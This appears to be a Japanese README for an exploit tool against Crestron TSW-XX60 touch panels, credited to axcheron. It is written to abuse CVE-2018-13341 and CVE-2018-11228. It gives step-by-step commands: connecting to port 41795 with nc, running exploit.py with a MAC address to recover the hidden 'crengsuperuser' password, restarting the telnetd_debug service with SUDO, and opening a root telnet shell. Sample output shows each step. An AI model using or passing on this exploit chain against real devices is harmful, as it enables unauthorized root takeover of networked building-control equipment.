
このツールはCVE-2018-13341を悪用することを目的としています。
このツールはCVE-2018-13341を悪用することを目的としており、対象デバイスのMACアドレスを使用することで、昇格された権限を持つ隠しアカウント*"crengsuperuser"*のパスワードを回復し、SUDOコマンドを実行できるようにします。
Crestron Toolbox Protocol (CTP) には、TSW-XX60デバイスのポート41795にアクセスすることで接続できます。
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> estat
The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
Link Status ....... : OK
DHCP .............. : ON
MAC Address ....... : 00.XX.XX.XX.XX.XX
IP Address ........ : [removed]
Subnet Mask ....... : [removed]
IPV6 Address ...... : [removed]
Default Gateway ... : [removed]
DNS Servers ........ : [removed] | DHCP |
[removed] | DHCP |
このツールにはCryptoGraphyモジュールが必要です。
# pip3 install cryptography
または
# pip3 install -r requirements.txt
usage: exploit.py [-h] [-m MAC]
# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass
CVE-2018-11228は、Crestron Terminal Protocol (CTP) のBash Shell Serviceを介した認証なしのRCEを可能にします。隠しアカウント*"crengsuperuser"*のパスワードを取得した後、マシン上でrootアクセスを得ることができます。
# nc -C w.x.y.z 41795
TSW-760 Control Console
TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************
Service telnetd_debug restarted
TSW-760>
その後、新しいシェルでボックスへのrootアクセスを取得できます。
# telnet w.x.y.z
bash# whoami
root
クレジット: axcheron